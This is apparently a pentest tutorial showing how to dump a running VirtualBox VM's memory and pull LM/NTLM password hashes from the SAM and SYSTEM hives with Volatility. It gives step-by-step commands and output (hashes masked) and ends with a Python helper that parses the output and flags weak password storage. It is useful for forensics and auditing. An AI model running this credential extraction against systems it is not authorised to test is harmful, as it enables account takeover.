For this part I'm using the standalone version of Volatility for Windows. The goal is to dump LM/NTLM hashes from a Windows memory image.
When you have access to a host where virtual machines are running, but not to the VMs themselves, one option is to reboot the VM from an ISO and reset or extract the password that way. Of course this is very noisy, and for a pentester there are better ways. With VirtualBox you can dump a VM's memory while it is running.
For this test I am running an old Windows XP SP2 box in VirtualBox. The host system is running Windows 8.1.
Dump the memory:
C:\Program Files\Oracle\VirtualBox>vboxmanage debugvm "WinXP_1" dumpvmcore --filename c:\Users\dax\Downloads\volatility_2.4.win.standalone\test.elf
From here it is the usual steps:
C:\Users\dax\Downloads\volatility_2.4.win.standalone\volatility_2.4.win.standalone>volatility-2.4.standalone.exe imageinfo -f test.elf
Volatility Foundation Volatility Framework 2.4
Determining profile based on KDBG search…
Suggested Profile(s) : WinXPSP2x86, WinXPSP3x86 (Instantiated with WinXPSP2x86)
AS Layer1 : IA32PagedMemory (Kernel AS)
AS Layer2 : OSXPmemELF (Unnamed AS)
AS Layer3 : FileAddressSpace (C:\Users\dax\Downloads\volatility_2.4.win.standalone\volatility_2.4.win.standalone\test.elf)
PAE type : No PAE
DTB : 0x39000L
KDBG : 0x8054cde0L
Number of Processors : 1
Image Type (Service Pack) : 3
KPCR for CPU 0 : 0xffdff000L
KUSER_SHARED_DATA : 0xffdf0000L
Image date and time : 2016-01-22 10:11:07 UTC+0000
Image local date and time : 2016-01-22 11:11:07 +0100
C:\Users\dax\Downloads\volatility_2.4.win.standalone\volatility_2.4.win.standalone>volatility-2.4.standalone.exe hivelist -f test.elf --profile WinXPSP2x86
Volatility Foundation Volatility Framework 2.4
Virtual    Physical   Name
---------- ---------- ----
0xe1064380 0x043bf380 \??\C:\Dokumente und Einstellungen\x\Lokale Einstellungen\Anwendungsdaten\Microsoft\Windows\UsrClass.dat
0xe1078b60 0x04492b60 \Device\HarddiskVolume1\Dokumente und Einstellungen\x\NTUSER.DAT
0xe1b4bb60 0x1c5c0b60 \Device\HarddiskVolume1\Dokumente und Einstellungen\LocalService\Lokale Einstellungen\Anwendungsdaten\Microsoft\Windows\UsrClass.dat
0xe1ca9b60 0x1c562b60 \Device\HarddiskVolume1\Dokumente und Einstellungen\LocalService\NTUSER.DAT
0xe19f9b60 0x1bf35b60 \Device\HarddiskVolume1\Dokumente und Einstellungen\NetworkService\Lokale Einstellungen\Anwendungsdaten\Microsoft\Windows\UsrClass.dat
0xe19a77b0 0x1bb727b0 \Device\HarddiskVolume1\Dokumente und Einstellungen\NetworkService\NTUSER.DAT
0xe186f008 0x1c113008 \Device\HarddiskVolume1\WINDOWS\system32\config\software
0xe1875b60 0x1c11eb60 \Device\HarddiskVolume1\WINDOWS\system32\config\default
0xe187d008 0x1c135008 \Device\HarddiskVolume1\WINDOWS\system32\config\SAM
0xe186fb60 0x1c113b60 \Device\HarddiskVolume1\WINDOWS\system32\config\SECURITY
0xe13cd008 0x02c2c008 [no name]
0xe1035b60 0x028d2b60 \Device\HarddiskVolume1\WINDOWS\system32\config\system
0xe102e008 0x028cc008 [no name]
To retrieve the hashes, two values from this list are needed in the next step:
-y = virtual address of the system hive
-s = virtual address of the SAM hive
C:\Users\dax\Downloads\volatility_2.4.win.standalone\volatility_2.4.win.standalone>volatility-2.4.standalone.exe hashdump -f test.elf --profile WinXPSP2x86 -y 0xe1035b60 -s 0xe187d008
Volatility Foundation Volatility Framework 2.4
Administrator:500:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
Gast:501:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
Hilfeassistent:1000:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
SUPPORT_388945a0:1002:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
dax:1003:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
x:1004:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
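The two manual lookups above (picking the SYSTEM and SAM virtual addresses out of hivelist, then reading the pwdump-style lines that hashdump prints) as a small Python helper; it also flags what an auditor cares about in such a dump, accounts that still store an LM hash and accounts with a blank password. This is an added example, not part of the original post or of Volatility; the hivelist and hashdump text it parses is constructed to mirror the output shown above with made-up hash values, and the two EMPTY_* constants are the well-known hashes of an empty password.

```python
import re

# Well-known hashes of an empty LM password and an empty NT password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
# A hivelist data row: virtual address, physical address, hive name.
HIVE_ROW = re.compile(r"^(0x[0-9a-f]+)\s+(0x[0-9a-f]+)\s+(.+)$", re.I)

# Constructed sample in hivelist's layout, trimmed to a few rows.
SAMPLE_HIVELIST = r"""Virtual    Physical   Name
0xe187d008 0x1c135008 \Device\HarddiskVolume1\WINDOWS\system32\config\SAM
0xe13cd008 0x02c2c008 [no name]
0xe1035b60 0x028d2b60 \Device\HarddiskVolume1\WINDOWS\system32\config\system
"""

# Constructed pwdump-style hashdump output (the hash values are made up).
SAMPLE_HASHDUMP = """Volatility Foundation Volatility Framework 2.4
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
dax:1003:0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210:::
"""

def hive_addresses(hivelist_output):
    """Return (system, sam) virtual addresses for hashdump's -y and -s."""
    found = {}
    for line in hivelist_output.splitlines():
        m = HIVE_ROW.match(line.strip())
        if m:  # match on the last path component so 'SAM' and 'system' both hit
            leaf = m.group(3).rsplit("\\", 1)[-1].lower()
            if leaf in ("system", "sam"):
                found[leaf] = m.group(1)
    if set(found) != {"system", "sam"}:
        raise ValueError("hivelist output lacks the SYSTEM or SAM hive")
    return found["system"], found["sam"]

def hashdump_args(hivelist_output, image, profile):
    """Assemble the hashdump argument list the post types by hand."""
    y, s = hive_addresses(hivelist_output)
    return ["hashdump", "-f", image, "--profile", profile, "-y", y, "-s", s]

def audit_hashdump(hashdump_output):
    """Flag accounts that still store an LM hash or have a blank password."""
    findings = []
    for line in hashdump_output.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue  # banner or blank line, not a user:rid:lm:nt::: record
        user, _rid, lm, nt = parts[:4]
        if lm.lower() != EMPTY_LM:
            findings.append((user, "LM hash stored"))
        if nt.lower() == EMPTY_NT:
            findings.append((user, "blank password"))
    return findings
```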